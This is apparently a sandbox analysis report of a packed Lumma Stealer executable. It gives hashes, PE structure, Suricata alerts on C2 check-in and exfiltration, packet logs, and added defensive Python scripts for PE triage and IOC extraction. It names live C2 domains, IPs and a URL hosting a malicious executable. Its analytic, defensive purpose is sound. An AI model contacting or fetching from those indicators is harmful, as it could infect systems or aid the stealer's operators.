| random.exe.2.exe | malicious | LummaC |
| file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z | malicious | Unknown | 13.107.246.63
| S6oj0LoSiL.exe | malicious | LummaC | 13.107.246.63
| pM3fQBuTLy.exe | malicious | Vidar | 13.107.246.63
| NVkyG9HAeY.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
| SEPTobn3BR.exe | malicious | Remcos, DBatLoader | 13.107.246.63
| Brooming.vbs | malicious | Remcos, GuLoader | 13.107.246.63
| Gosjeufon.cpl.exe | malicious | Unknown | 13.107.246.63
| #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs | malicious | SmokeLoader | 13.107.246.63
| doc55334.html | malicious | HTMLPhisher | 13.107.246.63
| 3DI3mOIlxE.exe | malicious | LummaC, Stealc | 13.107.246.63
grannyejh.lat | S6oj0LoSiL.exe | malicious | LummaC | 104.21.64.80
| AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.179.109
| 469oyXQbRY.exe | malicious | LummaC | 172.67.179.109
| file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS | 104.21.64.80
| file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 172.67.179.109
| file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 104.21.64.80
| rK0CtrtVrl.exe | malicious | LummaC, Stealc | 104.21.64.80
| NHEXQatKdE.exe | malicious | LummaC | 172.67.179.109
| CefJcYwgWs.exe | malicious | LummaC, Stealc | 104.21.64.80
| tdMnK5A1pe.exe | malicious | LummaC | 104.21.64.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | bPkG0wTVon.exe | malicious | Unknown | 104.16.184.241
| 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
| S6oj0LoSiL.exe | malicious | LummaC | 104.21.64.80
| pM3fQBuTLy.exe | malicious | Vidar | 172.64.41.3
| dlhost.exe | malicious | XWorm | 104.20.4.235
| c2A6GRyAwn.dll | malicious | Nitol | 104.21.42.47
| script.hta | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
| c2A6GRyAwn.dll | malicious | Nitol | 104.21.42.47
| AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.209.202
| Brooming.vbs | malicious | Remcos, GuLoader | 104.21.86.72
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | S6oj0LoSiL.exe | malicious | LummaC | 104.21.64.80
| SEPTobn3BR.exe | malicious | Remcos, DBatLoader | 104.21.64.80
| Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | malicious | DBatLoader, FormBook | 104.21.64.80
| AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.64.80
| 469oyXQbRY.exe | malicious | LummaC | 104.21.64.80
| file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS | 104.21.64.80
| file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.21.64.80
| file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 104.21.64.80
| https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exe | malicious | Unknown | 104.21.64.80
| file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 104.21.64.80
No context

No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.946439369688254
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 661fW9gxDp.exe
File size: 1'841'664 bytes
MD5: 18c608e128d658aef6e267668ddb68e2
SHA1: 8da573d37440d3761aa89abec9f9efc0ee8773a6
SHA256: 1fe8d27012da0553ebe43b42313f32264779c2bc697df26bba458348dfec6607
SHA512: 5fed80391acc4b402d276ffcc22b8ae5c19b02be52021a6776b85d30e13b3c52c901c04e42b77083d0ab4ad1d5e1ef658de943deec640747289d1e117b4aa99d
SSDEEP: 24576:ezgUbVUt+ahQJrqTkAJxupr721WgNqHNewarWr6CGSpSG2qsSWIrrYt2:ezgF+aWJrqD+pG1WgGfuzG2BSWIrrw
TLSH: 9F8533001E1135E2F4EAC276D55B9FC4AD72B815DCA91E2CEF404F7D06A5B83A906CEE
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................H...........@...........................H.....9=....@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x88a000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint Preview (0x88a000, section .taggant)
Only the first instruction is a real entry stub; the bytes that follow are padding and data of the .taggant section (00 00 decodes as add byte ptr [eax], al), not code that executes.
Instruction
jmp 00007F646CBD1B3Ah
psubb mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Data Directories
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x53054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x52000          0x2b0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x531f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
<unnamed/special chars> | 0x1000 | 0x51000 | 0x24800 | bfdfa5602f1f7bf6e5e4606edb2b45ab | False | 0.9974114404965754 | data | 7.97782039480764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x2b0 | 0x400 | b1e85b1cd09caefc2d43268be72ef161 | False | 0.3603515625 | data | 5.183452444303608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
<unnamed/special chars> | 0x54000 | 0x29b000 | 0x200 | 9fc461d7a91687c357f4dab2ff97a918 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hjbgbzbr | 0x2ef000 | 0x19a000 | 0x199200 | 84a27d0db752064d63c37c4abf2d225d | False | 0.9944742018026276 | data | 7.9528967637667956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ijeloniv | 0x489000 | 0x1000 | 0x600 | ac4d7a8f3ff286289d39826abbee8911 | False | 0.5989583333333334 | data | 5.089694745008545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x48a000 | 0x3000 | 0x2200 | 2d63f03d4525b0fa355db33c764153b3 | False | 0.08915441176470588 | DOS executable (COM) | 1.1066724538408015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Every section except .rsrc and .idata is mapped execute+read+write, the entry point sits in .taggant rather than .text, the first section and hjbgbzbr are at near-maximal entropy (7.98 and 7.95), and the unnamed section at 0x54000 reserves 0x29b000 bytes of virtual space backed by only 0x200 bytes on disk: the static profile of a packed stub that unpacks the stealer into that region at runtime.
Resources
Name         RVA      Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0x52058  0x256  ASCII text, with CRLF line terminators                     0.5100334448160535

Imports
DLL           Import
kernel32.dll  lstrcpy
A single import (kernel32!lstrcpy) next to a whole-file entropy of 7.95 is the static footprint of a packer: the real import table is resolved at runtime after unpacking, so the Import Hash above identifies the packer stub, not the stealer.
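The section-level signatures in this report (entry point outside standard sections, section names with special chars, RWX sections, packed high-entropy sections, import hash) can all be computed from the PE headers alone. The script below is an added example, not Joe Sandbox code: it parses the section table of a raw PE image with the standard library and applies those checks. build_sample_pe() constructs a small 32-bit PE in memory that mirrors this report's layout (an unnamed RWX section, a .taggant section holding the entry point); it is constructed sample data, not the analysed file. For a real file, pass open(path, "rb").read() to triage(). The imphash() helper follows the pefile convention but omits pefile's ordinal-to-name tables.

```python
"""Static PE triage reproducing the section-level signatures in this report:
entry point outside standard sections, section names with special chars,
RWX sections, high-entropy (packed) sections, and the import hash.
Added example, not Joe Sandbox code. build_sample_pe() constructs a tiny
32-bit PE in memory that mirrors the report's layout; it is NOT the sample.
For a real file pass open(path, "rb").read() to triage()."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_SECTIONS = {".text", ".code", ".data", ".rdata", ".idata", ".edata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".pdata", ".crt"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a flat histogram; packed code sits above ~7."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]          # AddressOfEntryPoint
    sections, off = [], opt + size_opt
    for _ in range(num_sections):
        name, vsize, va, raw, ptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw": raw, "chars": chars, "entropy": shannon_entropy(pe[ptr:ptr + raw])})
        off += 40
    return entry_rva, sections

def triage(pe: bytes):
    """Return (entry-point section name, findings) for a raw PE image."""
    entry_rva, sections = parse_sections(pe)
    ep_section, findings = None, []
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]):
            ep_section = s["name"]
    if ep_section is None:
        findings.append("entry point not inside any section")
    elif ep_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies outside standard sections ({ep_section or '<unnamed>'})")
    for s in sections:
        label = s["name"] or "<unnamed>"
        if not s["name"] or not all(c.isascii() and (c.isalnum() or c in "._$") for c in s["name"]):
            findings.append(f"section name empty or with special chars: {s['name']!r}")
        if s["chars"] & RWX == RWX:
            findings.append(f"section {label} is RWX")
        if s["raw"] and s["entropy"] > 7.0:
            findings.append(f"section {label} high entropy {s['entropy']:.2f} (packed/encrypted)")
    return ep_section, findings

def imphash(imports) -> str:
    """pefile-style import hash: md5 over 'dll.func', lowercased, dll extension
    stripped (pefile's ordinal-to-name tables are omitted here)."""
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            dll = dll[:-len(ext)] if dll.endswith(ext) else dll
        parts.append(f"{dll}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()

def build_sample_pe() -> bytes:
    """Constructed 32-bit PE mirroring the report's layout (sample data, not the real file)."""
    file_align, sect_align, headers_size = 0x200, 0x1000, 0x200
    packed = bytes(range(256)) * 4             # flat histogram stands in for packed data
    stub = b"\xE9" + b"\x00" * 0x1FF           # lone 'jmp' plus padding, like .taggant
    specs = [(b"\x01\xFF\x02\x03", packed, 0x40 | RWX),          # name with special chars
             (b".rsrc", b"<assembly/>", 0x40 | IMAGE_SCN_MEM_READ),
             (b".taggant", stub, 0x40 | RWX)]                    # entry point lives here
    table, blobs, va, raw_ptr = b"", b"", sect_align, headers_size
    for name, data, chars in specs:
        raw = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, raw, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw, b"\0")
        va += -(-len(data) // sect_align) * sect_align
        raw_ptr += raw
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3000)                      # AddressOfEntryPoint -> .taggant
    struct.pack_into("<III", opt, 28, 0x400000, sect_align, file_align)
    struct.pack_into("<II", opt, 56, va, headers_size)           # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                           # IMAGE_SUBSYSTEM_WINDOWS_GUI
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt), 0x0102)
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(headers_size, b"\0") + blobs
```

Running triage(build_sample_pe()) yields ".taggant" as the entry-point section and five findings (entry point outside standard sections, the special-chars name, two RWX sections and one 8.0-entropy section), which is the same shape of result the report's signatures express for the real file. The entropy threshold of 7.0 is a rule of thumb: compressed resources and certificates also score high, so treat it as a triage prompt, not a verdict.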
Suricata IDS Alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T08:36:33.085082+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.9 | 58066 | 1.1.1.1 | 53 | UDP
2024-12-19T08:36:33.224767+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.9 | 65432 | 1.1.1.1 | 53 | UDP
2024-12-19T08:36:34.600746+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49717 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:34.600746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49717 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:35.509186+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49717 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:35.509186+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49717 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:36.729541+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49723 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:36.729541+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49723 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:37.545026+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49723 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:37.545026+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49723 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:39.215752+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49728 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:39.215752+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49728 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:41.495031+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49734 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:41.495031+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49734 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:43.756933+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49742 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:43.756933+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49742 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:46.568113+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49749 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:46.568113+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49749 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:47.431200+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49749 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:49.282619+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49758 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:49.282619+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49758 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:49.286427+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.9 | 49758 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:53.055358+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.9 | 49769 | 104.21.64.80 | 443 | TCP
2024-12-19T08:36:53.055358+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49769 | 104.21.64.80 | 443 | TCP
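The alert table above is the most useful part of the report for a responder: it carries the C2 domains (defanged by the ET rule authors as "name .tld"), the C2 peer, and the order of events per connection (resolve, TLS connect, check-in, exfiltration). The script below is an added example, not Joe Sandbox tooling: ALERTS is a constructed, tab-separated transcription of six of the rows above, the regex re-fangs the domains, and the helpers group alerts per 5-tuple and label each row with a coarse kill-chain stage. The stage keywords are assumptions chosen for these ET messages.

```python
"""Pull IOCs and per-flow alert sequences out of a sandbox report's Suricata table.
Added example, not Joe Sandbox tooling. ALERTS is a constructed, tab-separated
transcription of a subset of the report's rows; ET rule messages defang domains
as 'name .tld', so they are re-fanged before use."""
import re
from collections import defaultdict

ALERTS = """\
2024-12-19T08:36:33.085082+0100\t2058378\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)\t1\t192.168.2.9\t58066\t1.1.1.1\t53\tUDP
2024-12-19T08:36:33.224767+0100\t2058364\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)\t1\t192.168.2.9\t65432\t1.1.1.1\t53\tUDP
2024-12-19T08:36:34.600746+0100\t2058365\tET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)\t1\t192.168.2.9\t49717\t104.21.64.80\t443\tTCP
2024-12-19T08:36:34.600746+0100\t2028371\tET JA3 Hash - Possible Malware - Fake Firefox Font Update\t3\t192.168.2.9\t49717\t104.21.64.80\t443\tTCP
2024-12-19T08:36:35.509186+0100\t2054653\tET MALWARE Lumma Stealer CnC Host Checkin\t1\t192.168.2.9\t49717\t104.21.64.80\t443\tTCP
2024-12-19T08:36:47.431200+0100\t2048094\tET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration\t1\t192.168.2.9\t49749\t104.21.64.80\t443\tTCP
"""

# 'grannyejh .lat' -> ('grannyejh', 'lat'); 'any.run' (no space) deliberately does not match
DEFANGED = re.compile(r"\b([a-z0-9-]+) \.([a-z]{2,})\b")
COLUMNS = ("ts", "sid", "msg", "severity", "src", "sport", "dst", "dport", "proto")

def parse_alerts(text: str):
    """One dict per row, numeric fields converted, domains re-fanged from the message."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = dict(zip(COLUMNS, line.split("\t")))
        for key in ("sid", "severity", "sport", "dport"):
            rec[key] = int(rec[key])
        rec["domains"] = [f"{name}.{tld}" for name, tld in DEFANGED.findall(rec["msg"].lower())]
        rows.append(rec)
    return rows

def extract_iocs(rows):
    """Domains from rule messages plus C2 peers (TCP destinations of severity-1 hits).
    DNS resolvers are excluded on purpose: the resolver is not the adversary."""
    domains = {d for r in rows for d in r["domains"]}
    c2_ips = {r["dst"] for r in rows if r["proto"] == "TCP" and r["severity"] == 1}
    return {"domains": sorted(domains), "c2_ips": sorted(c2_ips)}

def flows(rows):
    """SIDs per 5-tuple, in table order (the report lists alerts chronologically)."""
    out = defaultdict(list)
    for r in rows:
        out[(r["src"], r["sport"], r["dst"], r["dport"], r["proto"])].append(r["sid"])
    return dict(out)

def kill_chain(rows):
    """Coarse stage per row, keyed on phrases in the ET messages (assumed keywords)."""
    stages = []
    for r in rows:
        msg = r["msg"]
        if "DNS Lookup" in msg:
            stages.append("resolve")
        elif "Exfiltration" in msg or "POST" in msg:
            stages.append("exfil")
        elif "Checkin" in msg:
            stages.append("checkin")
        elif "SNI" in msg:
            stages.append("tls-connect")
        else:
            stages.append("other")
    return stages
```

On the transcribed rows, extract_iocs() returns the two domains and 104.21.64.80, and flows() shows the first TLS connection (source port 49717) carrying SNI match, JA3 match and check-in in that order. Note that 104.21.64.80 sits in Cloudflare's address space, so the domain (or the TLS SNI) is the actionable indicator; an IP block would also hit unrelated CDN tenants.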
TCP Packets
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 19, 2024 08:36:33.367808104 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:33.367827892 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:33.367899895 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:33.371110916 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:33.371124029 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:34.600641966 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:34.600745916 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:34.607291937 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:34.607326031 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:34.607639074 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:34.648840904 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:34.719356060 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:34.719393969 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:34.719484091 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:35.509182930 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:35.509357929 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:35.509418011 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:35.511423111 CET  49717        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:35.511451006 CET  443          49717      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:35.519669056 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:35.519722939 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:35.519830942 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:35.520113945 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:35.520131111 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:36.729399920 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:36.729541063 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:36.739363909 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:36.739409924 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:36.739686012 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:36.740967989 CET  49723        443        192.168.2.9   104.21.64.80
Dec 19, 2024 08:36:36.741003990 CET  49723        443        192.168.2.9   104.21.64.80
